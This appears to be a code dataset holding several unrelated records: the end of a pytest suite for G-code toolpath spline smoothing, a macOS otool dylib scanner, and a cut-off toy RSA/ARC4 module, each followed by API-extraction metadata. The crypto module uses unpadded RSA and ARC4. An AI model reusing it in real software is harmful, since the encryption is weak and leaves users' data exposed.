assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \
pytest.approx(0, abs=1e-12), msg
def check_line_start_point_middle(self):
msg = "The start point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg
self.check_distance(self.spline_start, 0.5)
def check_line_start_point_end(self):
msg = "The start point of the spline segment is not on the end of the line"
assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg)
self.check_distance(self.spline_start, 1.0)
def check_point_on_middle_of_line(self):
msg = "The middle point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
self.check_distance(self.spline_mid, 0.5)
def check_point_on_line(self):
msg = "The middle point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
def check_end_point_end(self):
msg = "The end point of the spline segment does not match the line end point"
assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg
self.check_distance(self.spline_end, 1.0)
end_error_segment = "The end point of the spline segment is not on the line"
def check_end_point_on(self):
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \
pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment
def check_corner_end_point_on(self):
assert point_on_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\
SegmentChecker.end_error_segment
end_error_segment_middle = "The end point of the spline segment is not on the middle of the line"
def check_end_point_middle(self):
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 0.5)
def check_corner_end_point_middle(self):
assert point_on_middle_of_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 1.5)
def check_continuity(self):
msg = "There's a discontinuity at the end of the spline segment"
if self.s > 0:
prev_end = self.data.smoothed_toolpath.segment_end[self.s-1]
assert prev_end == self.spline_start, \
"The previous segment does not end where the current one starts"
assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start),
err_msg=msg)
assert self.spline.distance(self.spline_start-1e-12) <=\
self.spline.distance(self.spline_start) and \
self.spline.distance(self.spline_start-1e-12) == \
pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \
"The previous segment end distance and the current segment start do not match up"
def check_corner_spline_order(self):
assert self.spline_end > self.spline_mid, \
"The endpoint of the corner spline is before the line segment end"
corner_error = "The closest point of the corner is not close enough"
def check_corner_middle_normal(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def check_corner_middle_short(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\
pytest.approx(0.01, abs=1e-12), \
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def straight_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, False)
if start == "start":
checker.check_start_point_start()
elif start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
elif start == "end":
checker.check_line_start_point_end()
else:
assert False, "Invalid start type"
if start == "start" and end == "end":
checker.check_point_on_middle_of_line()
else:
checker.check_point_on_line()
if end == "end":
checker.check_end_point_end()
elif end == "on":
checker.check_end_point_on()
elif end == "middle":
checker.check_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def corner_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, True)
checker.check_corner_spline_order()
if start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
else:
assert False, "Invalid start type"
if start == "middle" or end == "middle":
checker.check_corner_middle_normal()
else:
checker.check_corner_middle_short()
if end == "on":
checker.check_corner_end_point_on()
elif end == "middle":
checker.check_corner_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def check_distances(data):
t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10)
assert_array_almost_equal(data.smoothed_toolpath.distance(t),
np.linspace(0, data.smoothed_toolpath.total_distance(), 10))
def test_straight_line(plotter):
data = generate_curves([
"G1 X100 Y200"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 1
straight_segment(data, l=0, s=0, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) ==\
pytest.approx(np.linalg.norm([100, 200]))
check_distances(data)
plotter(data)
def test_two_straight_lines(plotter):
data = generate_curves([
"G1 X50 Y50",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 2
straight_segment(data, l=0, s=0, start="start", end="end")
straight_segment(data, l=1, s=1, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(
np.linalg.norm([50, 50]) + np.linalg.norm([50, 50])
)
check_distances(data)
plotter(data)
def test_90_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0
assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1)
check_distances(data)
plotter(data)
def test_45_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_acute_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner_counter_clockwise(plotter):
data = generate_curves([
"G1 X-100 Y-100",
"G1 X-200 Y-100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_obtuse_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_shorter_and_longer_line(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X30 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_longer_and_shorter_line(plotter):
data = generate_curves([
"G1 X20 Y0",
"G1 X30 Y-0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="on")
corner_segment(data, l=1, s=3, start="on", end="on")
straight_segment(data, l=2, s=4, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
def test_three_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1",
"G1 X30 Y0.3"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
# Note that this line is very short
straight_segment(data, l=1, s=2, start="middle", end="middle")
corner_segment(data, l=1, s=3, start="middle", end="middle")
straight_segment(data, l=2, s=4, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) <\
10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines_with_z_move(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 Z10",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
straight_segment(data, l=1, s=3, start="end", end="end")
straight_segment(data, l=3, s=4, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
| [
"numpy.sum",
"os.makedirs",
"vibration_compensation.read_gcode",
"os.path.realpath",
"pytest.fixture",
"vibration_compensation.bokeh_imports.Figure",
"numpy.linalg.norm",
"os.path.splitext",
"vibration_compensation.bokeh_imports.save",
"pytest.approx",
"os.path.join"
] | [((205, 235), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (219, 235), False, 'import pytest\n'), ((641, 673), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (655, 673), False, 'import pytest\n'), ((328, 356), 'os.path.join', 'os.path.join', (['path', '"""output"""'], {}), "(path, 'output')\n", (340, 356), False, 'import os\n'), ((362, 394), 'os.makedirs', 'os.makedirs', (['path'], {'exist_ok': '(True)'}), '(path, exist_ok=True)\n', (373, 394), False, 'import os\n'), ((511, 524), 'vibration_compensation.bokeh_imports.save', 'plt.save', (['ret'], {}), '(ret)\n', (519, 524), True, 'import vibration_compensation.bokeh_imports as plt\n'), ((585, 617), 'vibration_compensation.read_gcode', 'read_gcode', (['gcode', 'maximum_error'], {}), '(gcode, maximum_error)\n', (595, 617), False, 'from vibration_compensation import read_gcode, Data\n'), ((2045, 2072), 'numpy.linalg.norm', 'np.linalg.norm', (['(point - mid)'], {}), '(point - mid)\n', (2059, 2072), True, 'import numpy as np\n'), ((288, 314), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (304, 314), False, 'import os\n'), ((746, 907), 'vibration_compensation.bokeh_imports.Figure', 'plt.Figure', ([], {'plot_width': '(1000)', 'plot_height': '(1000)', 'x_range': '(-250, 250)', 'y_range': '(-250, 250)', 'match_aspect': '(True)', 'lod_threshold': 'None', 'title': 'request.node.name'}), '(plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=\n (-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name\n )\n', (756, 907), True, 'import vibration_compensation.bokeh_imports as plt\n'), ((1907, 1936), 'numpy.linalg.norm', 'np.linalg.norm', (['(linea - lineb)'], {}), '(linea - lineb)\n', (1921, 1936), True, 'import numpy as np\n'), ((3002, 3053), 'numpy.linalg.norm', 'np.linalg.norm', (['(data.end_xy - data.start_xy)'], {'axis': '(1)'}), '(data.end_xy - data.start_xy, axis=1)\n', (3016, 3053), True, 'import numpy as np\n'), ((3086, 3108), 'numpy.sum', 'np.sum', (['xy_lengths[:l]'], {}), '(xy_lengths[:l])\n', (3092, 3108), True, 'import numpy as np\n'), ((10870, 10916), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (10876, 10916), True, 'import numpy as np\n'), ((11372, 11418), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (11378, 11418), True, 'import numpy as np\n'), ((11975, 12021), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (11981, 12021), True, 'import numpy as np\n'), ((12042, 12088), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (12048, 12088), True, 'import numpy as np\n'), ((12092, 12119), 'pytest.approx', 'pytest.approx', (['(200)'], {'abs': '(0.1)'}), '(200, abs=0.1)\n', (12105, 12119), False, 'import pytest\n'), ((12560, 12606), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (12566, 12606), True, 'import numpy as np\n'), ((12654, 12700), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (12660, 12700), True, 'import numpy as np\n'), ((13219, 13265), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (13225, 13265), True, 'import numpy as np\n'), ((13311, 13357), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (13317, 13357), True, 'import numpy as np\n'), ((13936, 13982), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (13942, 13982), True, 'import numpy as np\n'), ((14030, 14076), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (14036, 14076), True, 'import numpy as np\n'), ((14679, 14725), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (14685, 14725), True, 'import numpy as np\n'), ((14773, 14819), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (14779, 14819), True, 'import numpy as np\n'), ((15343, 15389), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (15349, 15389), True, 'import numpy as np\n'), ((15435, 15481), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (15441, 15481), True, 'import numpy as np\n'), ((16031, 16077), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16037, 16077), True, 'import numpy as np\n'), ((16123, 16169), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16129, 16169), True, 'import numpy as np\n'), ((16723, 16769), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16729, 16769), True, 'import numpy as np\n'), ((16815, 16861), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16821, 16861), True, 'import numpy as np\n'), ((17416, 17462), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (17422, 17462), True, 'import numpy as np\n'), ((17508, 17554), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (17514, 17554), True, 'import numpy as np\n'), ((18217, 18263), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (18223, 18263), True, 'import numpy as np\n'), ((18282, 18328), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (18288, 18328), True, 'import numpy as np\n'), ((18346, 18373), 'pytest.approx', 'pytest.approx', (['(300)'], {'abs': '(0.1)'}), '(300, abs=0.1)\n', (18359, 18373), False, 'import pytest\n'), ((19037, 19083), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (19043, 19083), True, 'import numpy as np\n'), ((19170, 19216), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (19176, 19216), True, 'import numpy as np\n'), ((19946, 19992), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (19952, 19992), True, 'import numpy as np\n'), ((20011, 20057), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (20017, 20057), True, 'import numpy as np\n'), ((20075, 20102), 'pytest.approx', 'pytest.approx', (['(300)'], {'abs': '(0.1)'}), '(300, abs=0.1)\n', (20088, 20102), False, 'import pytest\n'), ((1830, 1859), 'numpy.linalg.norm', 'np.linalg.norm', (['(linea - point)'], {}), '(linea - point)\n', (1844, 1859), True, 'import numpy as np\n'), ((1862, 1891), 'numpy.linalg.norm', 'np.linalg.norm', (['(lineb - point)'], {}), '(lineb - point)\n', (1876, 1891), True, 'import numpy as np\n'), ((4341, 4368), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (4354, 4368), False, 'import pytest\n'), ((4632, 4659), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(0.001)'}), '(0, abs=0.001)\n', (4645, 4659), False, 'import pytest\n'), ((5253, 5280), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (5266, 5280), False, 'import pytest\n'), ((5560, 5587), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (5573, 5587), False, 'import pytest\n'), ((6086, 6113), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (6099, 6113), False, 'import pytest\n'), ((6312, 6339), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (6325, 6339), False, 'import pytest\n'), ((6652, 6679), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(0.001)'}), '(0, abs=0.001)\n', (6665, 6679), False, 'import pytest\n'), ((6963, 6990), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(0.001)'}), '(0, abs=0.001)\n', (6976, 6990), False, 'import pytest\n'), ((8602, 8632), 'pytest.approx', 'pytest.approx', (['(0.01)'], {'abs': '(1e-12)'}), '(0.01, abs=1e-12)\n', (8615, 8632), False, 'import pytest\n'), ((10947, 10973), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 200]'], {}), '([100, 200])\n', (10961, 10973), True, 'import numpy as np\n'), ((12615, 12641), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (12629, 12641), True, 'import numpy as np\n'), ((13274, 13298), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (13288, 13298), True, 'import numpy as np\n'), ((13991, 14017), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14005, 14017), True, 'import numpy as np\n'), ((14734, 14760), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14748, 14760), True, 'import numpy as np\n'), ((15398, 15422), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (15412, 15422), True, 'import numpy as np\n'), ((16085, 16110), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (16099, 16110), True, 'import numpy as np\n'), ((16777, 16802), 'numpy.linalg.norm', 'np.linalg.norm', (['[20, 0.1]'], {}), '([20, 0.1])\n', (16791, 16802), True, 'import numpy as np\n'), ((17470, 17495), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (17484, 17495), True, 'import numpy as np\n'), ((19132, 19157), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.2]'], {}), '([10, 0.2])\n', (19146, 19157), True, 'import numpy as np\n'), ((3743, 3776), 'pytest.approx', 'pytest.approx', (['line_dist'], {'abs': '(0.1)'}), '(line_dist, abs=0.1)\n', (3756, 3776), False, 'import pytest\n'), ((11467, 11491), 'numpy.linalg.norm', 'np.linalg.norm', (['[50, 50]'], {}), '([50, 50])\n', (11481, 11491), True, 'import numpy as np\n'), ((11494, 11518), 'numpy.linalg.norm', 'np.linalg.norm', (['[50, 50]'], {}), '([50, 50])\n', (11508, 11518), True, 'import numpy as np\n'), ((12738, 12764), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (12752, 12764), True, 'import numpy as np\n'), ((13395, 13419), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (13409, 13419), True, 'import numpy as np\n'), ((14114, 14140), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14128, 14140), True, 'import numpy as np\n'), ((14857, 14883), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14871, 14883), True, 'import numpy as np\n'), ((15519, 15543), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (15533, 15543), True, 'import numpy as np\n'), ((16206, 16231), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (16220, 16231), True, 'import numpy as np\n'), ((16898, 16923), 'numpy.linalg.norm', 'np.linalg.norm', (['[20, 0.1]'], {}), '([20, 0.1])\n', (16912, 16923), True, 'import numpy as np\n'), ((17591, 17616), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (17605, 17616), True, 'import numpy as np\n'), ((19104, 19129), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (19118, 19129), True, 'import numpy as np\n'), ((19281, 19306), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.2]'], {}), '([10, 0.2])\n', (19295, 19306), True, 'import numpy as np\n'), ((435, 461), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (451, 461), False, 'import os\n'), ((19253, 19278), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (19267, 19278), True, 'import numpy as np\n')] |
import subprocess
import threading
from collections import defaultdict
from concurrent.futures import Executor
from concurrent.futures.thread import ThreadPoolExecutor
class RecursiveLibraryScanner:
def __init__(self, executor: Executor, scan_private: bool):
self.executor = executor
self.libraries = defaultdict(set)
self.scanned = set()
self.scan_private = scan_private
self.jobs = []
self.all_done = threading.Event()
def _check(self, job):
if all(j.done() for j in self.jobs):
self.all_done.set()
def _enqueue(self, target):
job = self.executor.submit(self._scan, target)
job.add_done_callback(self._check)
self.jobs.append(job)
def _scan(self, target):
# print("scanning", target, file=sys.stderr)
self.scanned.add(target)
for lib in scan_libraries(target):
self.libraries[target].add(lib)
if lib not in self.scanned:
is_private = smells_private(lib)
if (is_private and self.scan_private) or not is_private:
self._enqueue(lib)
def scan(self, target):
self._enqueue(target)
self.all_done.wait()
return self.libraries
def scan_libraries_recursive(initial_target, scan_private=True):
with ThreadPoolExecutor() as executor:
rls = RecursiveLibraryScanner(executor, scan_private=scan_private)
return rls.scan(initial_target)
def scan_libraries(target):
in_load_dylib = False
libraries = set()
for line in subprocess.check_output(
["otool", "-l", target], encoding="utf-8"
).splitlines():
line = line.strip()
if line == "cmd LC_LOAD_DYLIB":
in_load_dylib = True
if in_load_dylib and line.startswith("name "):
words = line.split()
lib = words[1]
libraries.add(lib)
in_load_dylib = False
return libraries
def smells_private(lib):
if lib.startswith("/System/Library"):
return True
if lib.startswith("/usr/lib/"):
return True
if lib.startswith("/usr/local/lib/"):
return True
return False
def filter_private(scanned_libraries):
public_libraries = {
target: {lib for lib in libraries if not smells_private(lib)}
for (target, libraries) in scanned_libraries.items()
if not smells_private(target)
}
return public_libraries
| [
"collections.defaultdict",
"subprocess.check_output",
"concurrent.futures.thread.ThreadPoolExecutor",
"threading.Event"
] | [((323, 339), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (334, 339), False, 'from collections import defaultdict\n'), ((457, 474), 'threading.Event', 'threading.Event', ([], {}), '()\n', (472, 474), False, 'import threading\n'), ((1339, 1359), 'concurrent.futures.thread.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {}), '()\n', (1357, 1359), False, 'from concurrent.futures.thread import ThreadPoolExecutor\n'), ((1582, 1648), 'subprocess.check_output', 'subprocess.check_output', (["['otool', '-l', target]"], {'encoding': '"""utf-8"""'}), "(['otool', '-l', target], encoding='utf-8')\n", (1605, 1648), False, 'import subprocess\n')] |
import time
import base64
import binascii
from secrets import token_hex
from rsa import prime
from arc4 import ARC4
def gcd(a, b):
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return a * b // gcd(a, b)
def imod(a, n):
i = 1
while True:
c = n * i + 1
if(c % a == 0):
c = c//a
break
i = i+1
return c
def arc4_encrypt(key, message):
arc4 = ARC4(key)
cipher = arc4.encrypt(message)
return cipher
def arc4_decrypt(key, cipher):
arc4 = ARC4(key)
plain = arc4.decrypt(cipher)
return plain
class SimpleRSA:
def __init__(self, bit_length=256):
p, q = 0, 0
while p == q:
p = prime.getprime(bit_length)
q = prime.getprime(bit_length)
self.p = p
self.q = q
self.N = self.p*self.q
self.phi = lcm(self.p - 1, self.q - 1)
self.e = 65537
self.d = imod(self.e, self.phi)
def dump(self):
return (self.p, self.q, self.N, self.phi, self.e, self.d)
def load(self, p, q, N, phi, e, d):
self.p = p
self.q = q
self.N = N
self.phi = phi
self.e = e
self.d = d
def get_pub(self):
return (self.N, self.e)
def get_priv(self):
return (self.N, self.d)
def encrypt(self, m, other_pubkey):
if not isinstance(m, int):
m = int(binascii.hexlify(m.encode()))
return pow(m, other_pubkey[1], other_pubkey[0])
